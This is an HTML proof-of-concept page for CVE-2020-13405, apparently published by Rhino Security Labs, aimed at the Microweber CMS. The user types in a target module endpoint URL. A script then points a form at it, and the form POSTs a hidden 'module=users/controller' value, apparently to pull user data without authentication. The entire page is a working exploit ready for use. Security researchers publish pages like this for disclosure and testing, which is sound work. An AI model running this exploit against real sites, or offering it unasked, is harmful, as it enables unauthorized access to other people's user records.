<html>
   <head>
   <meta name="referrer" content="origin">
      <script>
		function updateForm()
         {
         	var modulesUrl = document.getElementById("module_url").value;
         	if(modulesUrl != "")
         	{
             document.getElementById("exploit_form").action = modulesUrl;
         	return true;
         	}
         	else
         	{
         	alert("Please enter a URL into the MicroWeber Module Endpoint URL field.")
         	return false;
         	}
        }
      </script>
   </head>
   <h1 style="color:red;">CVE-2020-13405 PoC</h1>
   <h3 style="color:red;">Rhino Security Labs</h3>
   
   </br>
   
   <label for="fname">MicroWeber Module Endpoint URL</label>
   <input type="text" id="module_url" name="module_url" placeholder="http://localhost/module">
   
   <form action="/placeholder" method="post" id="exploit_form" name="exploit_form">
      <input type="submit" value="Attempt Exploit" onclick="return updateForm()">
	  <input type="hidden" id="module" name="module" value="users/controller">
   </form>
   
</html>
